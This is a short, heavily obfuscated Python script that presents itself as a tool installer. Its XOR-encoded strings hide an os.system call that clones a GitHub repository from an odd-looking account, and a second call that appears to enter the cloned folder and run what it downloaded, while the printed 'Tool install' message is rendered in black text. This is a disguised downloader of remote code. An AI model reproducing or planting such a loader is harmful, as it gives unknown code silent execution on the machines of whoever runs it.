O1OOOO00010OO01l11O11 = (lambda OO01OOOl01llO11l1OOll,
    l101l0lO1110ll0lOl1ll: OO01OOOl01llO11l1OOll ^ l101l0lO1110ll0lOl1ll)
OOll10llOlOOl0O1O0110 = __import__(''.join(chr(OO01011Ol11Ol1O1OOl1l ^
    lOOll0O1ll0ll00lO1O0l) for lOOll0O1ll0ll00lO1O0l, OO01011Ol11Ol1O1OOl1l in
    zip(b'\x10\t', b'bl')), globals(), locals(), [], 0)
llOl0OlO0Ol1l00lllO11 = __import__(''.join(chr(l111Ol1l1l1000Ol0l11O ^
    lOOO01l1l00lOl01ll001) for lOOO01l1l00lOl01ll001, l111Ol1l1l1000Ol0l11O in
    zip(b'!\xf1', b'N\x82')), globals(), locals(), [], 0 * 2 + 0)
print(''.join(chr(O1OOOO00010OO01l11O11(llllO1l0OOlO11lO0ll10,
    l1l01O1l0O11010110lOO)) for l1l01O1l0O11010110lOO,
    llllO1l0OOlO11lO0ll10 in zip(
    b'z\xaf\x8f%y\x11\xd4\xc2\xee\xe9\xa5R\xeb#%A\xff_\n',
    b'a\xf4\xbf\x1eJ!\xb9\x96\x81\x86\xc9r\x82MV5\x9e3f')))
getattr(llOl0OlO0Ol1l00lllO11, 'sys' + 'tem')(''.join(chr(
    ll0l1Olll00111ll0l1O0 ^ OO0OOl00OO1l010OO1011) for 
    OO0OOl00OO1l010OO1011, ll0l1Olll00111ll0l1O0 in zip(
    b"Z\xbe@r\xda\x01hM&\x8b\xa2\n!w\x8bD>\x81\x0f\xaa\xd7u3\xabop)\\\ryBh\xb0\xea\xcf>E;\xb0\x17\xff'k"
    ,
    b"5\x90o\x18\xb2b\x1e#H\xe1\xc9kM'\xa4)Q\xe2!\xc8\xa2\x1dG\xc2\x08_\x06f~\t6\x1c\xd8\xca\xaaP*W\xd37\x8bN\x0c"
    ))[::-1])
getattr(llOl0OlO0Ol1l00lllO11, ''.join(chr(ll11OO1lO01O110l1l01O ^
    lll00OOOl11O01Olll100) for lll00OOOl11O01Olll100, ll11OO1lO01O110l1l01O in
    zip(b'\xed\x946\xa4u\xd1', b'\x9e\xedE\xd0\x10\xbc')))(''.join(chr(
    O1OOOO00010OO01l11O11(l1O101l1ll00OlOOOlOl1, l1O0000l011O1O001l1O0)) for
    l1O0000l011O1O001l1O0, l1O101l1ll00OlOOOlOl1 in zip(
    b"\x1aX\xdfK\xf7\x9d\xb7D\xcct\xde`\xda\xd5\x89\x08'~\xce",
    b'y<\xffe\x98\xbd\xd6*\xa8T\xae\x19\xae\xbd\xe6f\x07P\xa1')))
